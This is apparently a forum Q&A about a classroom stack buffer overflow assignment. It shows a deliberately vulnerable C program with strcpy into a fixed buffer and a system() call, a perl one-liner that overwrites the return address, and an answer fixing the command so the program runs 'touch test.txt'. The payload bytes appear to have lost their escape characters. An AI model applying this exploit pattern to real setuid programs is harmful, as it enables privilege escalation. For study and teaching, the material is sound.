c - Exploiting a Stack Buffer Overflow

Question

I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:

$ ./script $(perl -e 'print "A" x 36 . "x40x83x04x08"' | touch test.txt)

We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.

From what I gather, the issue is either syntax or quotation marks.

How could I correct the one liner?

Source for Script

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

char arg1[60];
char arg2[60];

void func(char *s){
    char buf[32];
    strcpy(buf, s);
    
    printf("you entered: %s
", buf);
}

void secret(){
  system(arg2);
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s some_string
", argv[0]);
        return 2;
    }
    strcpy(arg1, argv[1]);

    if (argc == 3) {
      strcpy(arg2, argv[2]);
    }
      
    func(argv[1]);
    return 0;
}

Answer 1

I think you the part that says | touch test.txt) is not needed.

./script $(perl -e 'print "A" x 36 . "x40x83x04x08"') "touch test.txt"

should work.

I am not sure why you are piping the output of the shell script to the touch command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).

As in terms of why it's being executed as normal user, in your scenario, your shell was running touch as a normal user. What I think you want to do is run your script as root (either by making it a setuid binary or just running the program with sudo, and make the script actually perform the call to system("touch ...");.